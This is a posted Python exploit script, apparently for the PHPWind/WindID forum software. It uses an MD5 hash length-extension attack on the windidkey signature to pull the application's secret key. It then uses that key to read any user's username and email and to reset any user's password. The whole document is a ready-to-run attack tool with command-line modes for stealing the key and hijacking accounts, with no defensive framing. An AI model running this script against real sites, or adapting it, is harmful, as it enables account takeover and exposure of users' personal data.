· 9 years ago · Jun 22, 2016, 12:00 PM
1#!/usr/bin/env python
2# author: RickGray
3# update: 2016-05-25
4# >>>>>>>>>>>
5# requests, hashpumpy modules required
6# : pip install requests hashpumpy
7
8import re
9import json
10import time
11import hashlib
12import argparse
13import operator
14
15import requests
16import hashpumpy
17
18
19def md5(s):
20 return hashlib.md5(str(s)).hexdigest()
21
22
23def ksort(d):
24 sorted_d = sorted(d.iteritems(), key=operator.itemgetter(0))
25 return sorted_d
26
27
28def get_appkey(a, t, s, g, p):
29 array = ['windidkey', 'clientid', 'time', '_json', 'jcallback', 'csrf_token',
30 'Filename', 'Upload', 'token', '__data']
31 ss = ''
32 get = ksort(g)
33 post = ksort(p)
34 for k, v in get:
35 if k in array:
36 continue
37 ss += (str(k) + str(v))
38 for k, v in post:
39 if k in array:
40 continue
41 ss += (str(k) + str(v))
42
43 return md5(md5(a + '||' + s) + t + ss)
44
45
46def get_clientid_and_secretkey(t, c):
47 def fetch_uid(p):
48 pattern = r'%26uid%3D(?P<uid>[0-9]{1,})%26'
49 result = re.search(pattern, p)
50 return result.group('uid') if result else None
51
52 def fetch_windidkey(p):
53 pattern = r'%26windidkey%3D(?P<windidkey>[a-f0-9]{32})'
54 result = re.search(pattern, p)
55 return result.group('windidkey') if result else None
56
57 def fetch_time(p):
58 pattern = r'%26time%3D(?P<time>[0-9]+)%26'
59 result = re.search(pattern, p)
60 return result.group('time') if result else None
61
62 def fetch_clientid(p):
63 pattern = r'%26clientid%3D(?P<clientid>.*?)%26'
64 result = re.search(pattern, p)
65 return result.group('clientid') if result else None
66
67 _ = t + '/index.php?m=profile&c=avatar&_left=avatar'
68 text = requests.get(_, headers={'Cookie': c}).content
69
70 uid = fetch_uid(text)
71 windidkey = fetch_windidkey(text)
72 rtime = fetch_time(text)
73 clientid = fetch_clientid(text)
74
75 if uid and windidkey and rtime and clientid:
76 print('[*] uid = %s' % uid)
77 print('[*] windidkey = %s' % windidkey)
78 print('[*] time = %s' % rtime)
79 print('[*] clientid = %s' % clientid)
80
81 origin = rtime + 'adoAvatarcavatarmapitypeflashuid{}uidundefined'.format(uid)
82 # a=get&c=app&m=api&id=1 str.=key+val ksort($POST)
83 padding = 'agetcappid1mapi'
84 fakehash, fakedata = hashpumpy.hashpump(windidkey, origin, padding, 32)
85 print('[*] fakehash = %s' % fakehash)
86 print('[*] fakedata = 0x%s' % fakedata.encode('hex'))
87 __ = t + '/windid/index.php'
88 params = {
89 origin.replace(rtime, ''): re.search(r'(\x80.*\x00)', fakedata).group(1),
90 'clientid': clientid,
91 'time': rtime,
92 'windidkey': fakehash,
93 }
94 data = dict(a='get', c='app', id='1', m='api')
95 response = requests.post(__,
96 params=params,
97 data=data, headers={'Cookie': c})
98 print('[*] content = %s' % response.content)
99 secret = json.loads(response.content)['secretkey']
100 return clientid, secret
101 else:
102 print('error in fetch data with content')
103 return None
104
105
106def fetch_user_info(t, clientid, secret, uid):
107 _ = t + '/windid/index.php'
108 ctime = str(int(time.time()))
109 params = {
110 'userid': uid,
111 'time': ctime,
112 'clientid': clientid
113 }
114 data = dict(a='get', c='user', m='api')
115 appkey = get_appkey(str(clientid), ctime, secret, params, data)
116 params['windidkey'] = appkey
117 response = requests.post(_, params=params, data=data)
118 infos = json.loads(response.content)
119 username = infos['username']
120 email = infos['email']
121
122 print('[*] uid = %s' % uid)
123 print('[^] >>>>>>>>> username = %s' % username)
124 print('[^] email = %s' % email)
125
126
127def change_user_password(t, clientid, secret, uid, password):
128 fetch_user_info(t, clientid, secret, uid)
129
130 _ = t + '/windid/index.php'
131 ctime = str(int(time.time()))
132 params = {
133 'time': ctime,
134 'clientid': clientid
135 }
136 data = dict(uid=uid, a='editUser', c='user', m='api', password=password)
137 appkey = get_appkey(str(clientid), ctime, secret, params, data)
138 params['windidkey'] = appkey
139 response = requests.post(_, params=params, data=data)
140
141 return response.content
142
143
144def parse_args():
145 parser = argparse.ArgumentParser()
146
147 subparsers = parser.add_subparsers(dest='mode')
148 getsecret = subparsers.add_parser('getsecret', help='get secret key value')
149 getsecret.add_argument('-c', '--cookie', dest='COOKIE', type=str,
150 help='the cookie logined with any user')
151
152 chpass = subparsers.add_parser('chpass',
153 help='change user password with secret key')
154 chpass.add_argument('-i', '--clientid', dest='CLIENTID', type=int,
155 help='the clientid windid used')
156 chpass.add_argument('-s', '--secretkey', dest='SECRETKEY', type=str,
157 help='the client secret key used')
158 chpass.add_argument('-u', '--uid', dest='UID', type=int,
159 help='the user uid you want to change')
160 chpass.add_argument('-p', '--password', dest='PASSWORD', type=str,
161 help='the password you want to change')
162
163 parser.add_argument(dest='TARGET', type=str)
164
165 return parser.parse_args()
166
167
168if __name__ == '__main__':
169 args = parse_args()
170
171 if args.mode == 'getsecret':
172 target = args.TARGET
173 cookie = args.COOKIE
174 try:
175 cid, secretkey = get_clientid_and_secretkey(target, cookie)
176 if cid and secretkey:
177 print('')
178 print('[^] >>>>>>>>> secretkey = %s' % secretkey)
179 print('[^] clientid = %s' % cid)
180 except Exception as ex:
181 print('failed get secretkey, ("{}")'.format(str(ex)))
182 elif args.mode == 'chpass':
183 target = args.TARGET
184 cid = args.CLIENTID
185 key = args.SECRETKEY
186 u = args.UID
187 pp = args.PASSWORD
188 try:
189 res = change_user_password(target, cid, key, u, pp)
190 if res == '1':
191 print('')
192 print('[^] >>>>>>>>> succeed!')
193 print('[^] password = %s' % pp)
194 except Exception as ex:
195 print('failed change user password, ("{}")'.format(str(ex)))